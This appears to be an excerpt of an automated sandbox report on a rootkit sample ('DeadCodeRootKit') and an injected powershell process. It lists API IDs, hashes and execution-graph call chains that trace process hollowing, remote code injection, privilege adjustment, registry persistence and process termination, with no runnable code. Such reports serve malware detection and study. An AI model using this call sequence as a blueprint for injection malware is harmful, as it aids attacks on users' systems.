                                                        • Snapshot File: hcaresult_3_2_b00000_DeadCodeRootKit.jbxd
                                                        Similarity
                                                        • API ID: AddressHandleModuleProc
                                                        • String ID: RtlGetVersion$ntdll.dll
                                                        • API String ID: 1646373207-1489217083
                                                        • Opcode ID: 866f889c558d675e83477d6203bfdabd72d7f9d43e900279403a965f474cab53
                                                        • Instruction ID: a70f3d5828a9bb2ed224a698464ac569cc7196527bc4805cd1323b6965f12f6f
                                                        • Opcode Fuzzy Hash: 866f889c558d675e83477d6203bfdabd72d7f9d43e900279403a965f474cab53
                                                        • Instruction Fuzzy Hash: 77C09270FC13009AFF1A2FB0DD0DA1A3ED89E68B0338408D2B205F20E4EE64C40CD520

                                                        Execution Graph

                                                        Execution Coverage:7.7%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:44.4%
                                                        Total number of Nodes:27
                                                        Total number of Limit Nodes:0

                                                        Control-flow Graph

                                                        control_flow_graph 377 7ffd9b7f0c4d-7ffd9b7f0c59 378 7ffd9b7f0c5b-7ffd9b7f0c63 377->378 379 7ffd9b7f0c64-7ffd9b7f0cd8 377->379 378->379 383 7ffd9b7f0cda-7ffd9b7f0cdf 379->383 384 7ffd9b7f0ce2-7ffd9b7f0d25 NtWriteVirtualMemory 379->384 383->384 385 7ffd9b7f0d27 384->385 386 7ffd9b7f0d2d-7ffd9b7f0d4a 384->386 385->386
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1946439518.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ffd9b7e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: MemoryVirtualWrite
                                                        • String ID:
                                                        • API String ID: 3527976591-0
                                                        • Opcode ID: 7f7e9a2abca5b76a5701a82e9025d6660e9e83a65a10e9592c594c3fa0f738ad
                                                        • Instruction ID: 852bc6d63eae524ba9efdaed389421539da00224822b300e8f622d591dcf265e
                                                        • Opcode Fuzzy Hash: 7f7e9a2abca5b76a5701a82e9025d6660e9e83a65a10e9592c594c3fa0f738ad
                                                        • Instruction Fuzzy Hash: C431B331A0CB4C8FDB18DF58D885AE9BBE0FB59711F04426ED059D3692CB70A846CB85

Control-flow Graph (graph rendering omitted; the function calls NtResumeThread)
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1946439518.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ffd9b7e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 92bfed4054fa27ef5f6274612569d5f0a4c861a153082e1e44fb9e5afac811e3
                                                        • Instruction ID: 9c2f7d1317a029e25b3ad85b060b90eb59cbfc9cbb19afa91d479e9d58dcce52
                                                        • Opcode Fuzzy Hash: 92bfed4054fa27ef5f6274612569d5f0a4c861a153082e1e44fb9e5afac811e3
                                                        • Instruction Fuzzy Hash: 2831D331A0C64C8FDB58DFA8D845BEDBBE1EF56320F04426BD059D3292CB74A846CB91

Control-flow Graph (graph rendering omitted; the function calls NtUnmapViewOfSection)
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1946439518.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ffd9b7e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: SectionUnmapView
                                                        • String ID:
                                                        • API String ID: 498011366-0
                                                        • Opcode ID: b11e35f54595c5c8f542c23d6916185117eb706ea8d953628cc4cddc2721e18e
                                                        • Instruction ID: fe72e7335dce88b5025489f02ca336fb1dbce004e85da269f5ed4253d02cd182
                                                        • Opcode Fuzzy Hash: b11e35f54595c5c8f542c23d6916185117eb706ea8d953628cc4cddc2721e18e
                                                        • Instruction Fuzzy Hash: 4E31F630A0C6888FDB59DF68C855BE97FF0EF56320F08429FD049C72A7D664A446CB92

Control-flow Graph (graph rendering omitted; the function calls NtSetContextThread)
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1946439518.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ffd9b7e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: ContextThread
                                                        • String ID:
                                                        • API String ID: 1591575202-0
                                                        • Opcode ID: 0d531f4c7956a762bee5dfe99da4d2d1b2d29844d51c5e75a093fec336e9a9b7
                                                        • Instruction ID: f971b4db0f2fe464e28b8880571d3cfa44a450df3d1965a8ca4abdf58f33bd38
                                                        • Opcode Fuzzy Hash: 0d531f4c7956a762bee5dfe99da4d2d1b2d29844d51c5e75a093fec336e9a9b7
                                                        • Instruction Fuzzy Hash: DE21B131A0CB4C8FDB58DF98D886BE97BF0EB96320F04416FD049C3252CA74A846CB91

Control-flow Graph (graph rendering omitted; the function calls CreateProcessA and an internal routine at 7ffd9b7f099f)
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1946439518.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ffd9b7e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: 35970d58cde7fab5887ffc7b0f35bbc9b55bfa8eba718646a4097a295dcd37f8
                                                        • Instruction ID: 9274fc603f5511586327b0fc72cde6dae9cb650442ad05c8cd8ada9b15e41af8
                                                        • Opcode Fuzzy Hash: 35970d58cde7fab5887ffc7b0f35bbc9b55bfa8eba718646a4097a295dcd37f8
                                                        • Instruction Fuzzy Hash: 44D11330619B8D4FEB64DF28CC567E57BE0FF55310F0542AAD88DC72A2DA34A9458BC2

Control-flow Graph (graph rendering omitted; the function calls CreateFileMappingW and an internal routine at 7ffd9b7eed07)
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1946439518.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ffd9b7e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: CreateFileMapping
                                                        • String ID:
                                                        • API String ID: 524692379-0
                                                        • Opcode ID: 8c3dac3b35d228fc4cbd1ae7fc24a1ed6cbeb155b459b81a96ea458c56a2184f
                                                        • Instruction ID: 58c6497b259cc7a9975cde2ffd953a27fa3ecb0bbda94825e9558a1d5080efb3
                                                        • Opcode Fuzzy Hash: 8c3dac3b35d228fc4cbd1ae7fc24a1ed6cbeb155b459b81a96ea458c56a2184f
                                                        • Instruction Fuzzy Hash: 5A71C630608B8D4FDB59DF28CC567E57BE1FF59310F1442AAE84DC72A2DA74A8418B82

Control-flow Graph (graph rendering omitted; the function calls CreateFileA and an internal routine at 7ffd9b7eea9a)
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1946439518.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ffd9b7e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: ee23417063d29568cafc0c393e03b27ac88f4ca5b36de8fed21c76b6e9bc7a31
                                                        • Instruction ID: d4c6747042a44426802703746c1b2db22b6399a551ef93dd30e8b075eecf7ad3
                                                        • Opcode Fuzzy Hash: ee23417063d29568cafc0c393e03b27ac88f4ca5b36de8fed21c76b6e9bc7a31
                                                        • Instruction Fuzzy Hash: 6B61D830518B8D4FDBA8DF18D8567E477E1FF59310F14426AE84DC32A2CA74E9418B82

Control-flow Graph (graph rendering omitted; the function calls MapViewOfFile)
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1946439518.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ffd9b7e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: FileView
                                                        • String ID:
                                                        • API String ID: 3314676101-0
                                                        • Opcode ID: 6e8182d5656318a8b4e7d8b32e3925e6e5a6e943fcb1f9eb17b99c9cd7bde471
                                                        • Instruction ID: f35db250139db4b593d20634d1240a0848266be09745e11acd9ae4b49da8860b
                                                        • Opcode Fuzzy Hash: 6e8182d5656318a8b4e7d8b32e3925e6e5a6e943fcb1f9eb17b99c9cd7bde471
                                                        • Instruction Fuzzy Hash: 7741293090CA889FD71DDB68D8066F97BF0FF5A321F14026ED099D31A2CB647446CB91

Control-flow Graph (graph rendering omitted; the function calls K32GetModuleInformation)
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1946439518.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ffd9b7e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        • Opcode ID: ca442ac7187ea045a3a16433112d119e7f63fdcfb517ba607ad182beab6ecbd1
                                                        • Instruction ID: ca9f31a977f7b3087036573d3e50eff16d8304ec37e736bedc5b0c01ac2dfe1d
                                                        • Opcode Fuzzy Hash: ca442ac7187ea045a3a16433112d119e7f63fdcfb517ba607ad182beab6ecbd1
                                                        • Instruction Fuzzy Hash: E831C831E0CA4C4FDB18DB9898496F97BE1EF56321F04427FD059D3292CB756846C791
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1948550592.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ffd9b8b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a8b09bce70f6f3a808cb63f153217fc958925d5ef18f565a95e98e9ce3252f04
                                                        • Instruction ID: cf3908a00da70dd7f19dc53f1cb266b743226b23d4f93612e92fa861e05b304a
                                                        • Opcode Fuzzy Hash: a8b09bce70f6f3a808cb63f153217fc958925d5ef18f565a95e98e9ce3252f04
                                                        • Instruction Fuzzy Hash: E521D853E0FADE0FE7A1ABB868741646EC19F5A290B1901FEC06CC71E7E8086C054B51

                                                        Execution Graph

Execution Coverage: 5%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 12%
Total number of Nodes: 1249
Total number of Limit Nodes: 27
8175 2e86a097eb9 __scrt_release_startup_lock 8174->8175 8177 2e86a097ebd 8175->8177 8178 2e86a09a500 8175->8178 8179 2e86a09a537 8178->8179 8180 2e86a09a520 8178->8180 8179->8177 8181 2e86a09a528 8180->8181 8182 2e86a09a53e 8180->8182 8183 2e86a09b960 _set_errno_from_matherr 13 API calls 8181->8183 8184 2e86a09cd58 43 API calls 8182->8184 8185 2e86a09a52d 8183->8185 8186 2e86a09a543 8184->8186 8187 2e86a09b840 _invalid_parameter_noinfo 30 API calls 8185->8187 8209 2e86a09c510 GetModuleFileNameW 8186->8209 8187->8179 8194 2e86a09a5b5 8196 2e86a09b960 _set_errno_from_matherr 13 API calls 8194->8196 8195 2e86a09a5cd 8197 2e86a09a2e0 33 API calls 8195->8197 8198 2e86a09a5ba 8196->8198 8202 2e86a09a5e9 8197->8202 8199 2e86a09b9f8 __free_lconv_num 13 API calls 8198->8199 8199->8179 8200 2e86a09a5ef 8201 2e86a09b9f8 __free_lconv_num 13 API calls 8200->8201 8201->8179 8202->8200 8203 2e86a09a634 8202->8203 8204 2e86a09a61b 8202->8204 8207 2e86a09b9f8 __free_lconv_num 13 API calls 8203->8207 8205 2e86a09b9f8 __free_lconv_num 13 API calls 8204->8205 8206 2e86a09a624 8205->8206 8208 2e86a09b9f8 __free_lconv_num 13 API calls 8206->8208 8207->8200 8208->8179 8210 2e86a09c556 GetLastError 8209->8210 8211 2e86a09c56a 8209->8211 8233 2e86a09b8f0 8210->8233 8213 2e86a09ad0c 33 API calls 8211->8213 8215 2e86a09c598 8213->8215 8214 2e86a09c563 8216 2e86a097d60 _handle_error 8 API calls 8214->8216 8220 2e86a09c5a9 8215->8220 8238 2e86a09d614 8215->8238 8219 2e86a09a55a 8216->8219 8221 2e86a09a2e0 8219->8221 8241 2e86a09c3fc 8220->8241 8223 2e86a09a31e 8221->8223 8225 2e86a09a384 8223->8225 8255 2e86a09d108 8223->8255 8224 2e86a09a473 8227 2e86a09a4a0 8224->8227 8225->8224 8226 2e86a09d108 33 API calls 8225->8226 8226->8225 8228 2e86a09a4b8 8227->8228 8229 2e86a09a4f0 8227->8229 8228->8229 8230 2e86a09b980 _set_errno_from_matherr 13 API calls 8228->8230 8229->8194 8229->8195 8231 2e86a09a4e6 8230->8231 8232 2e86a09b9f8 __free_lconv_num 13 API calls 8231->8232 8232->8229 8234 
2e86a09b4c4 _set_errno_from_matherr 13 API calls 8233->8234 8235 2e86a09b901 8234->8235 8236 2e86a09b4c4 _set_errno_from_matherr 13 API calls 8235->8236 8237 2e86a09b91a 8236->8237 8237->8214 8239 2e86a09d3ec try_get_function 5 API calls 8238->8239 8240 2e86a09d634 8239->8240 8240->8220 8242 2e86a09c439 8241->8242 8244 2e86a09c420 8241->8244 8243 2e86a09c43e 8242->8243 8245 2e86a09d1a0 WideCharToMultiByte 8242->8245 8243->8244 8247 2e86a09b960 _set_errno_from_matherr 13 API calls 8243->8247 8244->8214 8246 2e86a09c491 8245->8246 8246->8243 8248 2e86a09c498 GetLastError 8246->8248 8249 2e86a09c4c1 8246->8249 8247->8244 8250 2e86a09b8f0 13 API calls 8248->8250 8251 2e86a09d1a0 WideCharToMultiByte 8249->8251 8252 2e86a09c4a5 8250->8252 8253 2e86a09c4e8 8251->8253 8254 2e86a09b960 _set_errno_from_matherr 13 API calls 8252->8254 8253->8244 8253->8248 8254->8244 8256 2e86a09d090 8255->8256 8257 2e86a09ad0c 33 API calls 8256->8257 8258 2e86a09d0b4 8257->8258 8258->8223 8259 2e86a0a16ab 8260 2e86a0a1950 8259->8260 8261 2e86a0a16eb 8259->8261 8264 2e86a0a2230 _log10_special 22 API calls 8260->8264 8266 2e86a0a1946 8260->8266 8261->8260 8262 2e86a0a171f 8261->8262 8263 2e86a0a1932 8261->8263 8267 2e86a0a2230 8263->8267 8264->8266 8270 2e86a0a2250 8267->8270 8271 2e86a0a226a 8270->8271 8272 2e86a0a224b 8271->8272 8274 2e86a0a2094 8271->8274 8272->8266 8275 2e86a0a20d4 _handle_error 8274->8275 8276 2e86a0a2140 _handle_error 8275->8276 8285 2e86a0a2350 8275->8285 8278 2e86a0a217d 8276->8278 8279 2e86a0a214d 8276->8279 8292 2e86a0a2688 8278->8292 8288 2e86a0a1f70 8279->8288 8282 2e86a0a217b _handle_error 8283 2e86a097d60 _handle_error 8 API calls 8282->8283 8284 2e86a0a21a5 8283->8284 8284->8272 8298 2e86a0a2378 8285->8298 8289 2e86a0a1fb4 _handle_error 8288->8289 8290 2e86a0a1fc9 8289->8290 8291 2e86a0a2688 _set_errno_from_matherr 13 API calls 8289->8291 8290->8282 8291->8290 8293 2e86a0a2691 8292->8293 8294 2e86a0a26a6 8292->8294 8295 2e86a0a269e 8293->8295 8297 2e86a09b960 
_set_errno_from_matherr 13 API calls 8293->8297 8296 2e86a09b960 _set_errno_from_matherr 13 API calls 8294->8296 8295->8282 8296->8295 8297->8295 8299 2e86a0a23b7 _raise_exc _clrfp 8298->8299 8300 2e86a0a25cc RaiseException 8299->8300 8301 2e86a0a2372 8300->8301 8301->8276 7196 2e86a09dba8 7207 2e86a09aebc EnterCriticalSection 7196->7207 7198 2e86a09dbb8 7199 2e86a09fccc 31 API calls 7198->7199 7200 2e86a09dbc1 7199->7200 7201 2e86a09dbcf 7200->7201 7202 2e86a09d9ac 33 API calls 7200->7202 7203 2e86a09af10 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 7201->7203 7204 2e86a09dbca 7202->7204 7205 2e86a09dbdb 7203->7205 7206 2e86a09da9c GetStdHandle GetFileType 7204->7206 7206->7201 8302 2e86a095cac 8303 2e86a095cb3 8302->8303 8304 2e86a095ce0 VirtualProtect 8303->8304 8306 2e86a095bf0 8303->8306 8305 2e86a095d09 GetLastError 8304->8305 8304->8306 8305->8306 8307 2e86a0a2aaf 8308 2e86a0a2b32 8307->8308 8309 2e86a0a2ac7 8307->8309 8309->8308 8315 2e86a09977c 8309->8315 8312 2e86a09977c 42 API calls 8313 2e86a0a2b29 8312->8313 8321 2e86a09ac20 8313->8321 8326 2e86a099798 8315->8326 8318 2e86a09978a 8318->8312 8319 2e86a09acb4 33 API calls 8320 2e86a099794 8319->8320 8322 2e86a09b348 33 API calls 8321->8322 8324 2e86a09ac29 8322->8324 8323 2e86a09acb4 33 API calls 8325 2e86a09ac3f 8323->8325 8324->8323 8327 2e86a099785 8326->8327 8328 2e86a0997b7 GetLastError 8326->8328 8327->8318 8327->8319 8338 2e86a099b10 8328->8338 8339 2e86a099930 __vcrt_InitializeCriticalSectionEx 5 API calls 8338->8339 8340 2e86a099b37 TlsGetValue 8339->8340 8342 2e86a09aaac 8345 2e86a09a878 8342->8345 8352 2e86a09a840 8345->8352 8350 2e86a09a7fc 13 API calls 8351 2e86a09a8a0 8350->8351 8353 2e86a09a850 8352->8353 8354 2e86a09a855 8352->8354 8355 2e86a09a7fc 13 API calls 8353->8355 8356 2e86a09a85c 8354->8356 8355->8354 8357 2e86a09a871 8356->8357 8358 2e86a09a86c 8356->8358 8357->8350 8359 2e86a09a7fc 13 API calls 8358->8359 8359->8357 8883 2e86a0a2bc2 8884 2e86a0a2bd1 
8883->8884 8885 2e86a0a2bdb 8883->8885 8887 2e86a09af10 LeaveCriticalSection 8884->8887 8360 2e86a0960c3 8361 2e86a0960d0 8360->8361 8362 2e86a0960dc GetThreadContext 8361->8362 8366 2e86a09623a 8361->8366 8363 2e86a096102 8362->8363 8362->8366 8363->8366 8371 2e86a096129 8363->8371 8364 2e86a096261 VirtualProtect FlushInstructionCache 8364->8366 8365 2e86a09631e 8367 2e86a09633e 8365->8367 8378 2e86a094800 8365->8378 8366->8364 8366->8365 8382 2e86a095210 GetCurrentProcess 8367->8382 8369 2e86a0961ad 8371->8369 8372 2e86a096186 SetThreadContext 8371->8372 8372->8369 8373 2e86a096397 8376 2e86a097d60 _handle_error 8 API calls 8373->8376 8374 2e86a096357 ResumeThread 8375 2e86a096343 8374->8375 8375->8373 8375->8374 8377 2e86a0963df 8376->8377 8380 2e86a09481c 8378->8380 8379 2e86a09487f 8379->8367 8380->8379 8381 2e86a094832 VirtualFree 8380->8381 8381->8380 8383 2e86a09522c 8382->8383 8384 2e86a095273 8383->8384 8385 2e86a095242 VirtualProtect FlushInstructionCache 8383->8385 8384->8375 8385->8383 8603 2e86a09d940 8604 2e86a09d979 8603->8604 8605 2e86a09d94a 8603->8605 8605->8604 8606 2e86a09d95f FreeLibrary 8605->8606 8606->8605 8607 2e86a092344 GetProcessIdOfThread GetCurrentProcessId 8608 2e86a0923ea 8607->8608 8609 2e86a09236f CreateFileW 8607->8609 8609->8608 8610 2e86a0923a3 WriteFile ReadFile CloseHandle 8609->8610 8610->8608 8611 2e86a09ab44 8612 2e86a09b9f8 __free_lconv_num 13 API calls 8611->8612 8613 2e86a09ab54 8612->8613 8614 2e86a09b9f8 __free_lconv_num 13 API calls 8613->8614 8615 2e86a09ab68 8614->8615 8616 2e86a09b9f8 __free_lconv_num 13 API calls 8615->8616 8617 2e86a09ab7c 8616->8617 8618 2e86a09b9f8 __free_lconv_num 13 API calls 8617->8618 8619 2e86a09ab90 8618->8619 7180 140002cb8 7181 140002cc5 7180->7181 7183 140002ce5 ConnectNamedPipe 7181->7183 7184 140002cda Sleep 7181->7184 7189 1400022fc AllocateAndInitializeSid 7181->7189 7185 140002cf4 ReadFile 7183->7185 7186 140002d29 Sleep 7183->7186 7184->7181 7187 140002d34 DisconnectNamedPipe 
7185->7187 7188 140002d17 7185->7188 7186->7187 7187->7183 7188->7187 7190 140002417 7189->7190 7191 140002359 SetEntriesInAclW 7189->7191 7190->7181 7191->7190 7192 14000239d LocalAlloc 7191->7192 7192->7190 7193 1400023b1 InitializeSecurityDescriptor 7192->7193 7193->7190 7194 1400023c1 SetSecurityDescriptorDacl 7193->7194 7194->7190 7195 1400023d8 CreateNamedPipeW 7194->7195 7195->7190 8620 2e86a09a13b 8621 2e86a09ac20 33 API calls 8620->8621 8622 2e86a09a140 8621->8622 7208 14000363c GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7209 140003692 K32EnumProcesses 7208->7209 7210 1400036ef SleepEx 7209->7210 7211 1400036a7 7209->7211 7210->7209 7211->7210 7213 140003198 7211->7213 7214 1400031d1 7213->7214 7215 1400031a9 7213->7215 7214->7211 7219 140001854 OpenProcess 7215->7219 7218 140001854 31 API calls 7218->7214 7220 140001cbe 7219->7220 7221 14000189f IsWow64Process 7219->7221 7220->7218 7222 1400018b7 CloseHandle 7221->7222 7222->7220 7224 1400018e0 7222->7224 7224->7220 7225 14000191c OpenProcess 7224->7225 7225->7220 7226 140001938 OpenProcess 7225->7226 7227 1400019f1 NtQueryInformationProcess 7226->7227 7228 140001957 K32GetModuleFileNameExW 7226->7228 7231 140001cb5 CloseHandle 7227->7231 7232 140001a16 7227->7232 7229 1400019a0 CloseHandle 7228->7229 7230 140001970 PathFindFileNameW lstrlenW 7228->7230 7229->7227 7234 1400019ae 7229->7234 7230->7229 7233 14000198d StrCpyW 7230->7233 7231->7220 7232->7231 7235 140001a20 OpenProcessToken 7232->7235 7233->7229 7234->7227 7237 1400019cd StrCmpIW 7234->7237 7235->7231 7236 140001a3e GetTokenInformation 7235->7236 7238 140001ae1 7236->7238 7239 140001a66 GetLastError 7236->7239 7237->7231 7237->7234 7241 140001ae8 CloseHandle 7238->7241 7239->7238 7240 140001a71 LocalAlloc 7239->7240 7240->7238 7242 140001a87 GetTokenInformation 7240->7242 7241->7231 7246 140001afc 7241->7246 7243 140001acf 7242->7243 7244 140001aaf GetSidSubAuthorityCount GetSidSubAuthority 7242->7244 7245 140001ad6 LocalFree 
7243->7245 7244->7245 7245->7241 7246->7231 7247 140001b8c StrStrA 7246->7247 7248 140001bb5 7246->7248 7247->7246 7249 140001bba 7247->7249 7248->7231 7249->7231 7250 140001be5 VirtualAllocEx 7249->7250 7250->7231 7251 140001c14 WriteProcessMemory 7250->7251 7251->7231 7252 140001c33 7251->7252 7260 140002c04 7252->7260 7254 140001c53 7254->7231 7255 140001c61 WaitForSingleObject 7254->7255 7256 140001caa CloseHandle 7255->7256 7257 140001c70 GetExitCodeThread 7255->7257 7256->7231 7258 140001c86 7257->7258 7259 140001c8f VirtualFreeEx 7257->7259 7258->7259 7259->7256 7263 1400020b8 GetModuleHandleA 7260->7263 7264 1400020e1 7263->7264 7265 1400020d8 GetProcAddress 7263->7265 7265->7264 8623 2e86a097f3c 8625 2e86a097f60 __scrt_release_startup_lock 8623->8625 8624 2e86a099eb9 8625->8624 8626 2e86a09b4c4 _set_errno_from_matherr 13 API calls 8625->8626 8627 2e86a099ee2 8626->8627 7277 140002d40 7280 140002d54 7277->7280 7325 140002a14 7280->7325 7283 140002a14 14 API calls 7284 140002d7c GetCurrentProcessId OpenProcess 7283->7284 7285 140002d9c OpenProcessToken 7284->7285 7286 140002e0e RegOpenKeyExW 7284->7286 7287 140002e05 CloseHandle 7285->7287 7288 140002db0 LookupPrivilegeValueW 7285->7288 7289 140002d49 ExitProcess 7286->7289 7290 140002e3f RegQueryValueExW 7286->7290 7287->7286 7288->7287 7291 140002dc7 AdjustTokenPrivileges 7288->7291 7290->7289 7292 140002e6f RegQueryValueExW 7290->7292 7291->7287 7293 140002dff GetLastError 7291->7293 7292->7289 7294 140002e9f GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc RegQueryValueExW 7292->7294 7293->7287 7294->7289 7295 140002f11 RegQueryValueExW 7294->7295 7295->7289 7296 140002f41 RegCloseKey GetCurrentProcessId 7295->7296 7339 140001ff8 GetProcessHeap HeapAlloc 7296->7339 7298 140002f58 RegCreateKeyExW 7299 140003052 CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 7298->7299 7300 140002f95 ConvertStringSecurityDescriptorToSecurityDescriptorW 7298->7300 7303 140001508 50 API calls 7299->7303 
7301 140002fd7 RegCreateKeyExW 7300->7301 7302 140002fbd RegSetKeySecurity LocalFree 7300->7302 7304 140003011 GetCurrentProcessId RegSetValueExW RegCloseKey 7301->7304 7305 140003048 RegCloseKey 7301->7305 7302->7301 7306 1400030dc 7303->7306 7304->7305 7305->7299 7307 1400030e8 ShellExecuteW 7306->7307 7308 14000311a 7306->7308 7307->7307 7307->7308 7309 140001480 6 API calls 7308->7309 7310 140003122 7309->7310 7311 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 7310->7311 7312 14000312b 7311->7312 7313 140001480 6 API calls 7312->7313 7314 140003134 7313->7314 7315 140001480 6 API calls 7314->7315 7316 14000313d 7315->7316 7317 140001480 6 API calls 7316->7317 7318 140003146 7317->7318 7319 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 7318->7319 7320 14000314f 7319->7320 7321 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 7320->7321 7322 140003158 7321->7322 7323 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 7322->7323 7324 140003161 GetProcessHeap HeapFree SleepEx 7323->7324 7324->7289 7326 140002be7 7325->7326 7327 140002a1d StrCpyW StrCatW GetModuleHandleW 7325->7327 7326->7283 7327->7326 7328 140002a6e GetCurrentProcess K32GetModuleInformation 7327->7328 7329 140002bde FreeLibrary 7328->7329 7330 140002a9e CreateFileW 7328->7330 7329->7326 7330->7329 7331 140002ad3 CreateFileMappingW 7330->7331 7332 140002bd5 CloseHandle 7331->7332 7333 140002afc MapViewOfFile 7331->7333 7332->7329 7334 140002bcc CloseHandle 7333->7334 7335 140002b1f 7333->7335 7334->7332 7335->7334 7336 140002b38 lstrcmpiA 7335->7336 7338 140002b76 7335->7338 7336->7335 7337 140002b78 VirtualProtect VirtualProtect 7336->7337 7337->7334 7338->7334 7345 140001cdc GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 7339->7345 7341 140002091 GetProcessHeap HeapFree 7342 14000203c 7342->7341 7343 14000205d OpenProcess 7342->7343 7343->7342 7344 140002073 TerminateProcess CloseHandle 7343->7344 7344->7342 7346 140001d69 7345->7346 
7347 140001e3c GetProcessHeap HeapFree GetProcessHeap RtlFreeHeap 7345->7347 7346->7347 7348 140001d7e OpenProcess 7346->7348 7350 140001e27 CloseHandle 7346->7350 7351 140001dd5 ReadProcessMemory 7346->7351 7347->7342 7348->7346 7349 140001d9b K32EnumProcessModulesEx 7348->7349 7349->7346 7349->7350 7350->7346 7352 140001df8 7351->7352 7352->7346 7352->7350 7352->7351 7607 2e86a097c50 7608 2e86a097c71 7607->7608 7609 2e86a097c6c 7607->7609 7611 2e86a097d80 7609->7611 7612 2e86a097da3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7611->7612 7613 2e86a097e17 7611->7613 7612->7613 7613->7608 8628 2e86a09a150 8629 2e86a09a1b7 8628->8629 8630 2e86a09a16d GetModuleHandleW 8628->8630 8643 2e86a09a048 8629->8643 8630->8629 8634 2e86a09a17a 8630->8634 8634->8629 8638 2e86a09a258 GetModuleHandleExW 8634->8638 8639 2e86a09a295 8638->8639 8640 2e86a09a27e GetProcAddress 8638->8640 8641 2e86a09a2a7 FreeLibrary 8639->8641 8642 2e86a09a2ad 8639->8642 8640->8639 8641->8642 8642->8629 8657 2e86a09aebc EnterCriticalSection 8643->8657 8665 2e86a09bd50 8666 2e86a09bd76 8665->8666 8675 2e86a09bd8c 8665->8675 8667 2e86a09b960 _set_errno_from_matherr 13 API calls 8666->8667 8668 2e86a09bd7b 8667->8668 8670 2e86a09b840 _invalid_parameter_noinfo 30 API calls 8668->8670 8669 2e86a09bdf9 8672 2e86a09a4a0 13 API calls 8669->8672 8671 2e86a09bd85 8670->8671 8678 2e86a09be6c 8672->8678 8673 2e86a09bee1 8676 2e86a09b9f8 __free_lconv_num 13 API calls 8673->8676 8675->8669 8677 2e86a09bdec 8675->8677 8686 2e86a09bf5c 8675->8686 8676->8677 8679 2e86a09bf22 8677->8679 8680 2e86a09b9f8 __free_lconv_num 13 API calls 8677->8680 8678->8673 8683 2e86a09bf44 8678->8683 8708 2e86a09ef30 8678->8708 8681 2e86a09b9f8 __free_lconv_num 13 API calls 8679->8681 8680->8677 8681->8671 8684 2e86a09b860 _invalid_parameter_noinfo 17 API calls 8683->8684 8685 2e86a09bf58 8684->8685 8687 2e86a09bf8a 8686->8687 8687->8687 8688 2e86a09b980 _set_errno_from_matherr 13 API calls 
